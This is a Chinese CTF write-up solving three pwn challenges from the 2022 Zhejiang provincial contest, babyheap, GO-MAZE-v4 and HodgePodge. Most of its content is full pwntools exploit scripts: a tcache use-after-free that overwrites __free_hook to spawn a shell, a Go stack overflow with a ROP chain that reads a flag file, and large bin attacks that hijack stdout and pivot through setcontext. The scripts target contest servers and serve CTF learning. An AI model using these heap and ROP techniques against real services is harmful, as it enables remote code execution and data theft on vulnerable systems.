2022浙江省赛 PWN题解析

chenqiang

原文链接：2022浙江省赛 PWN题解析

​
初赛
babyheap

2.27的正常堆题
题目分析

题目限制了add次数，只能add 7次，而且delet存在UAF占位 考虑UAF修改tcache chunk的key，使得无限free同一堆块填满tcache 溢出到UB，然后UAF leak libc 最后 UAF tcache poison 改free_hook 为one_gadget getshell。
成功截图

​

编辑
exp

1. 
   
2. def exp():
   
3.     global r
   
4.     global libc
   
5.     ##r=process('./babyheap')
   
6.     r=remote("1.14.97.218",24360)
   
7.     libc=ELF("./libc-2.27.so")
   
8. 
   
9.     ## leak_heap
   
10.     add(0x7f)
    
11.     add(0x7f)
    
12.     ##add(0x7f)
    
13.     ##add(0x7f)
    
14.     delet(0)
    
15.     edit(0,"nameless")
    
16.     ##z()
    
17.     show(0)
    
18.     r.recvuntil("nameless")
    
19.     heapbase=u64(r.recv(6).ljust(8,"\x00"))-0x10
    
20.     log.success("heapbase:"+hex(heapbase))
    
21. 
    
22.     ##leak libc
    
23.     for i in range(0,7):
    
24.         edit(0,p64(0)*2)
    
25.         delet(0)
    
26. 
    
27.     ##z()
    
28.     show(0)
    
29.     r.recvuntil("\n")
    
30.     libcbase=u64(r.recv(6).ljust(8,'\x00'))-0x3ebca0
    
31.     log.success("libcbase:"+hex(libcbase))
    
32. 
    
33.     ## set_libc func
    
34.     free_hook=libcbase+libc.sym["__free_hook"]
    
35.     system=libcbase+libc.sym["system"]   
    
36. 
    
37.     edit(0,p64(free_hook))
    
38.     add(0x7f) ##,"/bin/sh\x00")
    
39.     add(0x7f) ##,p64(system))
    
40.     edit(3,p64(system))
    
41.     edit(0,"/bin/sh\x00")
    
42.     ##z()
    
43.     delet(0)
    
44.     r.interactive()

复制代码

决赛

远程ld治好了的精神内耗
GO-MAZE-v4

一道go语言栈溢出
沙箱

​

编辑
保护​
​编辑

​

调试
发现连main函数入口都没有，简直逆不动（go语言的静态编译导致的elf本身就相当于c的libc，elf，ld等等的合集）。

先简单测试一下，发现wsad分别对应了上下左右，输的话就可以直接走通迷宫：
​

​编辑

​
然后紧接着应该是一个输入，测试测试有没有栈溢出，发现输入0x180个字节就报错了，并且rbp和rip是能被我们控制的。

​

编辑
（ps：gdb调试设置好set follow-fork-mode parent和set detach-on-fork on才能不会因为system或exec这类函数卡死）
而且这个二进制文件里面的gadget非常的齐活，直接打ORW就好。
exp

1. 
   
2. def up():
   
3.     r.sendline("w")
   
4. 
   
5. def down():
   
6.     r.sendline("s")
   
7. 
   
8. def right():
   
9.     r.sendline("d")
   
10. 
    
11. def exp():
    
12.     global r
    
13.     global libc
    
14.     ##global elf
    
15.     r=process('./pwn')
    
16.     for i in range(5):
    
17.         down()
    
18.     for i in range(3):
    
19.         right()
    
20.     for i in range(3):
    
21.         up()
    
22.     for i in range(3):
    
23.         right()
    
24.     up()
    
25.     right()
    
26.     up()
    
27.     up()
    
28.     ##z()
    
29. 
    
30.     ## gadgets
    
31.     pop_rdi_ret = 0x4008f6
    
32.     pop_rsi_ret = 0x40416f
    
33.     pop_rdx_ret = 0x51d4b6
    
34.     pop_rax_ret = 0x400a4f
    
35.     syscall = 0x4025ab
    
36.     leave_ret = 0x4015cb
    
37. 
    
38.     bss = 0xAD1600+0x500
    
39. 
    
40.     pd1 = flat(
    
41.     pop_rax_ret , 0 , pop_rdi_ret , 0 , pop_rsi_ret , bss , pop_rdx_ret , 0x210 ,
    
42.     syscall , leave_ret
    
43.     )
    
44. 
    
45.     ##z()
    
46.     r.sendlineafter("flag\x00",0x178*"a" + p64(bss) +  pd1)
    
47.     flag_addr = bss + 0x200
    
48.     pd=flat( 0 , pop_rax_ret , 2 , pop_rdi_ret , flag_addr , pop_rsi_ret , 0 , pop_rdx_ret , 0 ,
    
49.     syscall , pop_rax_ret , 0 , pop_rdi_ret , 3 , pop_rsi_ret , flag_addr , pop_rdx_ret , 0x210 ,
    
50.     syscall ,pop_rax_ret , 1 , pop_rdi_ret , 1 , pop_rsi_ret , flag_addr , pop_rdx_ret , 0x210 ,
    
51.     syscall , 0xdeadbeef
    
52.     ).ljust(0x200,"a")+"./flag\x00"
    
53.     r.sendline(pd)
    
54.     r.interactive()

复制代码

HodgePodge

省赛300分最难pwn题的含金量
版本

2.34魔改（不知道魔改了啥，本地调试的话直接用2204的2.35即可）
沙箱保护

​

编辑
保护

​

编辑
ida逆向

看看main：

很直接的菜单，_exit一眼house，但是不知道啥house，看看delet发现有UAF，show和edit都很常规。

而add用的是calloc：

​

编辑
想到了pig，但是pig打ORW有点不太好打，但是基本能确定large bin attack了。

attack啥呢？我一开始先试试打top_chunk，但是不行，原因是attack最后有一个add大堆块的操作，这个操作会使得top_chunk的地址抬高，覆盖，没办法触发kiwi的链子。于是我现找了一个链子——puts的stdout（真是比赛现找的）：
​​编辑​



如果largebin attack劫持stdout为chunk P，并且满足P的pre_size为0x8000（这个可以用空间复用实现），最后rdi就会赋值为P的堆地址。再看看接下来的流程：
​​编辑​

发现这个流程和flash_all_lock_up长得只有那么像了，当rdi+0x30，也就是堆地址+0xc0的位置为0并且堆地址+0xd8（vtable）的位置符合IO的虚表的地址范围，就会跳vtable+0x38的函数。

常用的跳表有三种，pig的IO_str_jumps、emma的IO_cookie_jumps以及apple的IO_wfile_jumps。但是apple当时不会，pig被排除，所以只能试试cookie_jumps，还真成了，在结束前30分钟本地通了。但是。。。这个B玩意要扬fs:0x30，fs就牵扯到ld表，这个玩意本地和远程偏移太不一样了，导致痛失300分。
非预期exp

1. # -*- coding: utf-8 -*-
   
2. from platform import libc_ver
   
3. from pwn import *
   
4. from hashlib import sha256
   
5. import base64
   
6. context.log_level='debug'
   
7. #context.arch = 'amd64'
   
8. context.arch = 'amd64'
   
9. context.os = 'linux'
   
10. 
    
11. rol = lambda val, r_bits, max_bits: \
    
12. (val << r_bits%max_bits) & (2**max_bits-1) | \
    
13. ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
    
14. 
    
15. ror = lambda val, r_bits, max_bits: \
    
16. ((val & (2**max_bits-1)) >> r_bits%max_bits) | \
    
17. (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
    
18. 
    
19. def proof_of_work(sh):
    
20.     sh.recvuntil(" == ")
    
21.     cipher = sh.recvline().strip().decode("utf8")
    
22.     proof = mbruteforce(lambda x: sha256((x).encode()).hexdigest() ==  cipher, string.ascii_letters + string.digits, length=4, method='fixed')
    
23.     sh.sendlineafter("input your ????>", proof)
    
24. ##r=remote("123.57.69.203",7010)0xafa849b09b753ccd
    
25. ##r=process('./sp1',env={"LD_PRELODA":"./libc-2.27.so"})
    
26. 
    
27. ##mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
    
28. 
    
29. def z():
    
30.     gdb.attach(r)
    
31. 
    
32. def cho(num):
    
33.     r.sendlineafter(">>",str(num))
    
34. 
    
35. def add(sz,con):
    
36.     cho(1)
    
37.     r.sendlineafter("Size:",str(sz))
    
38.     r.sendafter("content",con)
    
39.     ##r.sendlineafter("idx:",str(idx))
    
40. 
    
41. def delet(idx):
    
42.     cho(2)
    
43.     r.sendlineafter("idx:",str(idx))
    
44. 
    
45. def edit(idx,con):
    
46.     cho(3)
    
47.     r.sendlineafter("idx",str(idx))
    
48.     r.sendafter("Content",con)
    
49. 
    
50. def show(idx):
    
51.     cho(4)
    
52.     r.sendlineafter("idx",str(idx))
    
53. 
    
54. 
    
55. def exp(x):
    
56.     global r
    
57.     global libc
    
58.     ##global elf
    
59.     r=remote("1.14.97.218",23023)
    
60.     ##r=process('./pwn')
    
61.     libc=ELF("./libc.so.6")
    
62. 
    
63.     ## fengshui
    
64.     add(0x418,"nameless")
    
65.     add(0x410,"nameless")
    
66.     add(0x410,"ymnhymnh")
    
67.     add(0x420,"x1ngx1ng")
    
68.     add(0x420,"nameless")
    
69.     delet(3)
    
70.     ##delet(2)
    
71. 
    
72.     ## leak_libcbase
    
73.     ##z()
    
74.     show(3)
    
75.     r.recvuntil("\n")
    
76.     libcbase=u64(r.recv(6).ljust(8,"\x00"))-0x1f2cc0
    
77.     log.success("libcbase:"+hex(libcbase))
    
78.     add(0x430,"nameless")
    
79. 
    
80.     ## set_libc_func
    
81.     l_main=0x1f30b0+libcbase
    
82.     free_hook=libcbase+libc.sym["__free_hook"]
    
83.     stdout=libcbase+libc.sym["stdout"]
    
84.     IO_str_jumps=libcbase+0x1f3b58-0x38
    
85.     fsbase=libcbase-0x28c0+x
    
86.     godget=libcbase+0x146020##libcbase+0x1482ba
    
87.     setcontext=libcbase+0x50bc0
    
88. 
    
89.     ## leak_heapbase
    
90.     ##z()
    
91.     edit(3,"x1ngx1ng"+"nameless")
    
92.     ##z()
    
93.     show(3)
    
94.     r.recvuntil("nameless")
    
95.     heapbase=u64(r.recv(6).ljust(8,"\x00"))-0xef0
    
96.     log.success("heapbase:"+hex(heapbase))
    
97.     key=heapbase+0x6b0
    
98.     chunk1=heapbase+0x6b0
    
99.     chunk2=heapbase+0xef0
    
100.     ##z()
     
101. 
     
102.     ## set_orw
     
103.     open_addr=libcbase+libc.sym['open']
     
104.     read_addr=libcbase+libc.sym['read']
     
105.     write_addr=libcbase+libc.sym['write']
     
106.     pop_rdi_ret=libcbase+0x2daa2
     
107.     pop_rsi_ret=libcbase+0x37c0a
     
108.     pop_rdx_pop_rbx_ret=libcbase+0x87729
     
109.     ret=libcbase+0xecd6c
     
110.     flag_addr = key + 0x310
     
111.     chain = flat(
     
112.     pop_rdi_ret , flag_addr , pop_rsi_ret , 0 , open_addr,
     
113.     pop_rdi_ret , 3 , pop_rsi_ret , flag_addr , pop_rdx_pop_rbx_ret , 0x100 , 0 , read_addr,
     
114.     pop_rdi_ret , 1 , pop_rsi_ret, flag_addr , pop_rdx_pop_rbx_ret, 0x100 , 0 ,write_addr
     
115.     ).ljust(0x100,'\x00') + './flag\x00'
     
116. 
     
117. 
     
118.     ##large bin attack 2 yang point gurad
     
119.     edit(3,p64(l_main)*2+p64(heapbase+0xef0)+p64(fsbase+0x30-0x20))
     
120.     delet(1)
     
121.     ##z()
     
122.     add(0x430,"nameless")
     
123.     ##z()
     
124.     edit(3,p64(chunk1)+p64(l_main)+p64(chunk1)*2)
     
125.     edit(1,p64(l_main)+p64(chunk2)*3)
     
126. 
     
127.     ##z()
     
128.     add(0x410,"nameless")
     
129. 
     
130.     ##large in attack 2 ORW
     
131.     edit(3,p64(l_main)*2+p64(heapbase+0xef0)+p64(stdout-0x20))
     
132.     pd=0xb0*'a'+p64(0)
     
133.     pd=pd.ljust(0xc8,'a')+p64(IO_str_jumps)
     
134.     pd=pd.ljust(0xd0,"a")+p64(key+0x100)
     
135.     pd=pd.ljust(0xe0,"a")+p64(rol(key ^ godget,0x11,64))
     
136.     pd=pd.ljust(0xf8,"a")+p64(key+0x130)
     
137.     pd=pd.ljust(0x140,"a")+p64(setcontext+61)
     
138.     pd=pd.ljust(0x1c0,"a")+p64(key+0x210)+p64(ret)
     
139.     pd=pd.ljust(0x200,"a")+chain
     
140.     edit(7,pd)
     
141.     delet(7)
     
142.     edit(0,0x410*"a"+p64(0x8000))
     
143.     ##z()
     
144.     cho(1)
     
145.     r.sendlineafter("Size:",str(0x430))
     
146.     ##r.recvuntil("flag")
     
147.     flag="flag{"+r.recvuntil("\x00",drop=True)
     
148.     print(flag)
     
149.     r.interactive()
     
150. 
     
151. if __name__ == '__main__':
     
152.     while(1):
     
153.         i = -0x1000
     
154.         if i == 0x1000 :
     
155.            break
     
156.         else :
     
157.            try :
     
158.                exp(i)
     
159.            except:
     
160.                continue
     
161. 
     
162.     ##setcontext and orw
     
163.     ''''
     
164.     orw=p64(r4)+p64(2)+p64(r1)+p64(free_hook+0x28)+p64(syscall)
     
165.     orw+=p64(r4)+p64(0)+p64(r1)+p64(3)+p64(r2)+p64(mem)+p64(r3)+p64(0x20)+p64(0)+p64(syscall)
     
166.     orw+=p64(r4)+p64(1)+p64(r1)+p64(1)+p64(r2)+p64(mem)+p64(r3)+p64(0x20)+p64(0)+p64(syscall)
     
167.     orw+=p64(0xdeadbeef)
     
168.     pd=p64(gold_key)+p64(free_hook)
     
169.     pd=pd.ljust(0x20,'\x00')+p64(setcontext+61)+'./flag\x00'
     
170.     pd=pd.ljust(0xa0,'\x00')+p64(free_hook+0xb0)+orw0xafa849b09b753ccd
     
171.     r.sendafter(">>",pd)
     
172.     flag=r.recvline()
     
173.     '''
     
174. 
     
175.     ##orw
     
176.     '''
     
177.     ##[+]: set libc func
     
178.     IO_file_jumps=0x1e54c0+libcbase
     
179.     IO_helper_jumps=0x1e4980+libcbase
     
180.     setcontext=libcbase+libc.sym['setcontext']
     
181.     open_addr=libcbase+libc.sym['open']
     
182.     read_addr=libcbase+libc.sym['read']
     
183.     puts_addr=libcbase+libc.sym['puts']
     
184.     pop_rdi_ret=libcbase+0x2858f
     
185.     pop_rsi_ret=libcbase+0x2ac3f
     
186.     pop_rdx_pop_rbx_ret=libcbase+0x1597d6
     
187.     ret=libcbase+0x26699
     
188.     ##[+]: large bin attack to reset TLS
     
189.     ##z()
     
190.     ##edit(4,p64(libcbase+0x1e4230)+)
     
191. 
     
192.     ##[+]: orw
     
193.     flag_addr = heap_base + 0x4770 + 0x100
     
194.     chain = flat(
     
195.     pop_rdi_ret , flag_addr , pop_rsi_ret , 0 , open_addr,
     
196.     pop_rdi_ret , 3 , pop_rsi_ret , flag_addr , pop_rdx_pop_rbx_ret , 0x100 , 0 , read_addr,
     
197.     pop_rdi_ret , flag_addr , puts_addr
     
198.     ).ljust(0x100,'\x00') + 'flag\x00'
     
199.     '''
     
200. 
     
201.     ##banana
     
202.        ## b _dl_fini
     
203.        ## pwndbg> distance &_rtld_global &(_rtld_global._dl_ns._ns_loaded->l_next->l_next->l_next)
     
204.     '''''
     
205.     rop_chain = flat(pop_rdi_ret,bin_sh,ret,system_addr)
     
206.     link_4_addr = heap_base + 0xcd0
     
207.     fake_link_map = p64(0) + p64(0) + p64(0) + p64(link_4_addr)
     
208.     fake_link_map += p64(magic) + p64(ret)
     
209.     fake_link_map += p64(0)
     
210.     fake_link_map += rop_chain
     
211.     fake_link_map = fake_link_map.ljust(0xc8,'\0')
     
212.     fake_link_map += p64(link_4_addr + 0x28 + 0x18) # RSP
     
213.     fake_link_map += p64(pop_rdi_ret)   # RCX RIP
     
214.     fake_link_map = fake_link_map.ljust(0x100,'\x00')
     
215.     fake_link_map += p64(link_4_addr + 0x10 + 0x110)*0x3
     
216.     fake_link_map += p64(0x10)
     
217.     fake_link_map = fake_link_map.ljust(0x31C - 0x10,'\x00')
     
218.     fake_link_map += p8(0x8)
     
219.     edit(1,'\0'*0x520+p64(link_4_addr + 0x20)) ##控prev_data
     
220.     edit(2,fake_link_map)
     
221.     '''
     
222. 
     
223.     ##pig
     
224.       ## p _IO_flush_all_lockp
     
225.     ''''
     
226.     heap=heap+0x3b70
     
227.     pd=p64(0)*3+p64(0x1c)+p64(0)+p64(heap)+p64(heap+26)
     
228.     pd=pd.ljust(0xc8,b'\x00')
     
229.     pd+=p64(_IO_str_jumps)
     
230.     edit(3,pd)
     
231.     '''

复制代码

关于如何获取远程的ld偏移

第一种办法是爆破，参考wjh大佬的博客：https://blog.wjhwjhn.com/archives/593/

第二种是起一个有pwndbg的docker，把题目环境加载进去然后gdb fsbase获取偏移。这个起环境在github上有一个叫PWNdockerAll的项目，是pig007大佬写的，笔者在使用2204的过程中遇到了一点问题，自己鼓捣将install.sh稍作修改，使得它能够支持目前最新的2204版本（pig007大佬写的时候是2.34的2204，不兼容主要是因为python3.10的模块引用问题，那个时候python3.10好像还没出），现也在github上开源：

NSnidie/pwnDockerAll: 通过curl下载python3.10的pip3修复了2.34pip3的高版本module name冲突的bug，并且在容器中添加了ropper、patchelf、glibc-all-in-one等常用pwn题工具 (github.com)
（https://github.com/NSnidie/pwnDockerAll）
预期解——house of apple

apple 常用的是IO_wfile_overflow，期望的是前面执行je。

然后跳转到：

​

编辑
这里有啥好东西呢？发现有个和io_cookie_jumps一样的东西：

​

编辑
好家伙，就是只少一个point gurad，直接卡死我300分。

​

编辑
夜深了，不想再调了，卷Glibc都是精神内耗。
流程1

kiwi触发->malloc_assert->fxprintf->vfxprintf->locked_vfxprintf->vfprintf_internal->apple

这个做法需要一个堆溢出：

UAF+size存数组可实现堆溢出：

假定相邻堆块chunk1和chunk2，chunk2和top_chunk相邻。设定chunk1为0x430大小（题目大小），然后free进UB。add0x410，切割chunk1然后free chunk2，这时候，chunk1就和top_chunk相邻了，而且是0x420大小。由于我们数组存的是0x430大小，所以在edit的时候成功溢出0x10字节。可以改top_chunk的size打kiwi。
流程2

puts触发->apple
exp（针对流程2）

（ps此exp非题目所给libc，题目给的是魔改的2.34版本的libc，我用的2204的libc在本地打的）

​

1. 
   
2. # -*- coding: utf-8 -*-
   
3. from platform import libc_ver
   
4. from pwn import *
   
5. from hashlib import sha256
   
6. import base64
   
7. context.log_level='debug'
   
8. #context.arch = 'amd64'
   
9. context.arch = 'amd64'
   
10. context.os = 'linux'
    
11. 
    
12. rol = lambda val, r_bits, max_bits: \
    
13. (val << r_bits%max_bits) & (2**max_bits-1) | \
    
14. ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
    
15. 
    
16. ror = lambda val, r_bits, max_bits: \
    
17. ((val & (2**max_bits-1)) >> r_bits%max_bits) | \
    
18. (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
    
19. 
    
20. def proof_of_work(sh):
    
21.     sh.recvuntil(" == ")
    
22.     cipher = sh.recvline().strip().decode("utf8")
    
23.     proof = mbruteforce(lambda x: sha256((x).encode()).hexdigest() ==  cipher, string.ascii_letters + string.digits, length=4, method='fixed')
    
24.     sh.sendlineafter("input your ????>", proof)
    
25. ##r=remote("123.57.69.203",7010)0xafa849b09b753ccd
    
26. ##r=process('./sp1',env={"LD_PRELODA":"./libc-2.27.so"})
    
27. 
    
28. ##mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
    
29. 
    
30. def z():
    
31.     gdb.attach(r)
    
32. 
    
33. def cho(num):
    
34.     r.sendlineafter(">>",str(num))
    
35. 
    
36. def add(sz,con):
    
37.     cho(1)
    
38.     r.sendlineafter("Size:",str(sz))
    
39.     r.sendafter("content",con)
    
40.     ##r.sendlineafter("idx:",str(idx))
    
41. 
    
42. def delet(idx):
    
43.     cho(2)
    
44.     r.sendlineafter("idx:",str(idx))
    
45. 
    
46. def edit(idx,con):
    
47.     cho(3)
    
48.     r.sendlineafter("idx",str(idx))
    
49.     r.sendafter("Content",con)
    
50. 
    
51. def show(idx):
    
52.     cho(4)
    
53.     r.sendlineafter("idx",str(idx))
    
54. 
    
55. 
    
56. def exp():
    
57.     global r
    
58.     global libc
    
59.     ##global elf
    
60.     r=remote("124.222.96.143",10050)
    
61.     ##r=process('./pwn')
    
62.     libc=ELF("./libc.so.6")
    
63. 
    
64.     ## fengshui
    
65.     add(0x418,"nameless")
    
66.     add(0x410,"nameless")
    
67.     add(0x410,"ymnhymnh")
    
68.     add(0x420,"x1ngx1ng")
    
69.     add(0x420,"nameless")
    
70.     delet(3)
    
71.     ##delet(2)
    
72. 
    
73.     ## leak_libcbase
    
74.     ##z()
    
75.     show(3)
    
76.     r.recvuntil("\n")
    
77.     libcbase=u64(r.recv(6).ljust(8,"\x00"))-0x219ce0
    
78.     log.success("libcbase:"+hex(libcbase))
    
79.     add(0x430,"nameless")
    
80. 
    
81.     ## set_libc_func
    
82.     l_main=0x219ce0+libcbase
    
83.     free_hook=libcbase+libc.sym["__free_hook"]
    
84.     stdout=libcbase+libc.sym["stdout"]
    
85.     IO_wfile_jumps=libcbase+0x2160c0-0x20
    
86.     fsbase=libcbase-0x28c0
    
87.     godget=libcbase+0x1675b0 ##mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
    
88.     setcontext=libcbase+0x53a30
    
89. 
    
90.     ## leak_heapbase
    
91.     ##z()
    
92.     edit(3,"x1ngx1ng"+"nameless")
    
93.     ##z()
    
94.     show(3)
    
95.     r.recvuntil("nameless")
    
96.     heapbase=u64(r.recv(6).ljust(8,"\x00"))-0xef0
    
97.     log.success("heapbase:"+hex(heapbase))
    
98.     key=heapbase+0x6b0
    
99.     chunk1=heapbase+0x6b0
    
100.     chunk2=heapbase+0xef0
     
101.     ##z()
     
102. 
     
103.     ## set_orw
     
104.     open_addr=libcbase+libc.sym['open']
     
105.     read_addr=libcbase+libc.sym['read']
     
106.     write_addr=libcbase+libc.sym['write']
     
107.     pop_rdi_ret=libcbase+0x2a3e5
     
108.     pop_rsi_ret=libcbase+0x2be51
     
109.     pop_rdx_pop_rbx_ret=libcbase+0x90529
     
110.     ret=libcbase+0xf90e1
     
111.     flag_addr = key + 0x300
     
112.     chain = flat(
     
113.     pop_rdi_ret , flag_addr , pop_rsi_ret , 0 , open_addr,
     
114.     pop_rdi_ret , 3 , pop_rsi_ret , flag_addr , pop_rdx_pop_rbx_ret , 0x100 , 0 , read_addr,
     
115.     pop_rdi_ret , 1 , pop_rsi_ret, flag_addr , pop_rdx_pop_rbx_ret, 0x100 , 0 ,write_addr
     
116.     ).ljust(0x100,'\x00') + './flag\x00'
     
117. 
     
118.     ##large bin attack 2 apple
     
119.     edit(3,p64(l_main)*2+p64(heapbase+0xef0)+p64(stdout-0x20))
     
120.     pd=''
     
121.     pd=pd.ljust(0x90,"\x00")+p64(key+0xa0)
     
122.     pd=pd.ljust(0xb0,'\x00')+p64(0)
     
123.     pd=pd.ljust(0xc8,'\x00')+p64(IO_wfile_jumps)
     
124.     pd=pd.ljust(0x130,'\x00')+p64(key+0x200)+p64(ret)
     
125.     pd=pd.ljust(0x170,'\x00')+p64(key+0x180)
     
126.     pd=pd.ljust(0x1d8,'\x00')+p64(setcontext+61)
     
127.     pd=pd.ljust(0x1f0,'\x00')+chain
     
128.     edit(1,pd)
     
129.     delet(1)
     
130.     edit(0,0x410*"a"+p64(0x8000))
     
131.     ##z()
     
132.     cho(1)
     
133.     r.sendlineafter("Size:",str(0x430))
     
134.     ##r.recvuntil("flag")
     
135.     ##flag="flag{"+r.recvuntil("\x00",drop=True)
     
136.     ##print(flag)
     
137.     r.interactive()
     
138. 
     
139. if __name__ == '__main__':
     
140.     exp()
     
141. 
     
142.     ##setcontext and orw
     
143.     ''''
     
144.     orw=p64(r4)+p64(2)+p64(r1)+p64(free_hook+0x28)+p64(syscall)
     
145.     orw+=p64(r4)+p64(0)+p64(r1)+p64(3)+p64(r2)+p64(mem)+p64(r3)+p64(0x20)+p64(0)+p64(syscall)
     
146.     orw+=p64(r4)+p64(1)+p64(r1)+p64(1)+p64(r2)+p64(mem)+p64(r3)+p64(0x20)+p64(0)+p64(syscall)
     
147.     orw+=p64(0xdeadbeef)
     
148.     pd=p64(gold_key)+p64(free_hook)
     
149.     pd=pd.ljust(0x20,'\x00')+p64(setcontext+61)+'./flag\x00'
     
150.     pd=pd.ljust(0xa0,'\x00')+p64(free_hook+0xb0)+orw0xafa849b09b753ccd
     
151.     r.sendafter(">>",pd)
     
152.     flag=r.recvline()
     
153.     '''
     
154. 
     
155.     ##orw
     
156.     '''
     
157.     ##[+]: set libc func
     
158.     IO_file_jumps=0x1e54c0+libcbase
     
159.     IO_helper_jumps=0x1e4980+libcbase
     
160.     setcontext=libcbase+libc.sym['setcontext']
     
161.     open_addr=libcbase+libc.sym['open']
     
162.     read_addr=libcbase+libc.sym['read']
     
163.     puts_addr=libcbase+libc.sym['puts']
     
164.     pop_rdi_ret=libcbase+0x2858f
     
165.     pop_rsi_ret=libcbase+0x2ac3f
     
166.     pop_rdx_pop_rbx_ret=libcbase+0x1597d6
     
167.     ret=libcbase+0x26699
     
168.     ##[+]: large bin attack to reset TLS
     
169.     ##z()
     
170.     ##edit(4,p64(libcbase+0x1e4230)+)
     
171. 
     
172.     ##[+]: orw
     
173.     flag_addr = heap_base + 0x4770 + 0x100
     
174.     chain = flat(
     
175.     pop_rdi_ret , flag_addr , pop_rsi_ret , 0 , open_addr,
     
176.     pop_rdi_ret , 3 , pop_rsi_ret , flag_addr , pop_rdx_pop_rbx_ret , 0x100 , 0 , read_addr,
     
177.     pop_rdi_ret , flag_addr , puts_addr
     
178.     ).ljust(0x100,'\x00') + 'flag\x00'
     
179.     '''
     
180. 
     
181.     ##banana
     
182.        ## b _dl_fini
     
183.        ## pwndbg> distance &_rtld_global &(_rtld_global._dl_ns._ns_loaded->l_next->l_next->l_next)
     
184.     '''''
     
185.     rop_chain = flat(pop_rdi_ret,bin_sh,ret,system_addr)
     
186.     link_4_addr = heap_base + 0xcd0
     
187.     fake_link_map = p64(0) + p64(0) + p64(0) + p64(link_4_addr)
     
188.     fake_link_map += p64(magic) + p64(ret)
     
189.     fake_link_map += p64(0)
     
190.     fake_link_map += rop_chain
     
191.     fake_link_map = fake_link_map.ljust(0xc8,'\0')
     
192.     fake_link_map += p64(link_4_addr + 0x28 + 0x18) # RSP
     
193.     fake_link_map += p64(pop_rdi_ret)   # RCX RIP
     
194.     fake_link_map = fake_link_map.ljust(0x100,'\x00')
     
195.     fake_link_map += p64(link_4_addr + 0x10 + 0x110)*0x3
     
196.     fake_link_map += p64(0x10)
     
197.     fake_link_map = fake_link_map.ljust(0x31C - 0x10,'\x00')
     
198.     fake_link_map += p8(0x8)
     
199.     edit(1,'\0'*0x520+p64(link_4_addr + 0x20)) ##控prev_data
     
200.     edit(2,fake_link_map)
     
201.     '''
     
202. 
     
203.     ##pig
     
204.       ## p _IO_flush_all_lockp
     
205.     ''''
     
206.     heap=heap+0x3b70
     
207.     pd=p64(0)*3+p64(0x1c)+p64(0)+p64(heap)+p64(heap+26)
     
208.     pd=pd.ljust(0xc8,b'\x00')
     
209.     pd+=p64(_IO_str_jumps)
     
210.     edit(3,pd)
     
211.     '''

复制代码